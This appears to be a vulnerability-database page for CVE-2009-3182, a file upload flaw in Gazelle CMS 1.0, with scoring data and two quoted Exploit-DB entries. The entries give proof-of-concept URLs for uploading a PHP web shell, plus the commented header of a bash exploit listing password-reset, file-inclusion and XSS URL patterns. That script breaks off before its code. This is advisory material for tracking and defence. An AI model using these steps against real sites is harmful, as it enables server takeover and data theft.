CVE-2009-3182
published 2009-09-11CVE-2009-3182: Unrestricted file upload vulnerability in admin/editor/filemanager/browser.html in Anantasoft Gazelle CMS 1.0 allows remote attackers to execute arbitrary code…
PriorityP344medium6.8CVSS 2.0
AVNACMAuNCPIPAP
EXPLOIT
EPSS
3.29%
86.9th percentile
Unrestricted file upload vulnerability in admin/editor/filemanager/browser.html in Anantasoft Gazelle CMS 1.0 allows remote attackers to execute arbitrary code by uploading a file with an executable extension, then accessing it via a direct request to the file in user/File/.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| anantasoft | gazelle_cms | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Gazelle CMS 1.0 - Arbitrary File Upload
exploitdb·2009-08-13
CVE-2009-3182 Gazelle CMS 1.0 - Arbitrary File Upload
Gazelle CMS 1.0 - Arbitrary File Upload
---
| Gazelle CMS 1.0 Remote Arbitrary File Upload Vuln
| My Home Page : WwW.Sec-Code.CoM
| Founded By RoMaNcYxHaCkEr
[!] Discovered.: RoMaNcYxHaCkEr
[!] Vendor.....: http://www.anantasoft.com/index.php?Gazelle%20CMS/Download
[!] My Homepage...: WwW.Sec-Code.CoM
[!] Security - Codes Group ...: aB0-3tH4b T3rR0r , mr-al7rbi , sniper-code
[!] Contact Me ...: [email protected]
[!] PoC........:
http://localhost/Ananta_Gazelle1.0/admin/editor/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Image
^^^^
This Is Default In Editor admin
Try Change Image To File Like This :
http://localhost/Ananta_Gazelle1.0/admin/editor/filemanager/browser.html?Connector=connectors/php/connector.php&Type=File
Upload Any Shell.php Then You See That,s
Exploit-DB
Gazelle CMS 1.0 - Multiple Vulnerabilities / Remote Code Execution
exploitdb·2009-08-12
CVE-2009-3182 Gazelle CMS 1.0 - Multiple Vulnerabilities / Remote Code Execution
Gazelle CMS 1.0 - Multiple Vulnerabilities / Remote Code Execution
---
#!/bin/bash
# Gazelle CMS 1.0 Multiple Vulnerabilities
# Script Download: http://www.anantasoft.com/index.php?Gazelle%20CMS/Download
# Found by white_sheep on 11/08/2009
# Contact: [email protected] - https://www.ihteam.net
# Need magic_quote_gpc Off for RCE and LFI
# Thanks to r00t
#
# PASSWORD RESET:
# http://localhost/gazelle/renew.php?user=[username]
#
# LFI:
# author: fuzion (milw0rm.com/author/1343)
# http://localhost/gazelle/index.php?template=[LFI]
#
# XSS:
# http://localhost/gazelle/user.php?user=[XSS]
# http://localhost/gazelle/search.php?lookup=[CODE]
#
# RCE:
echo
echo "###############################################"
echo "# GazelleCMS 1.0 RCE #"
echo "# by white_sheep #"
echo "# sheewhite[at]googl
No writeups or analysis indexed.
2009-09-11
Published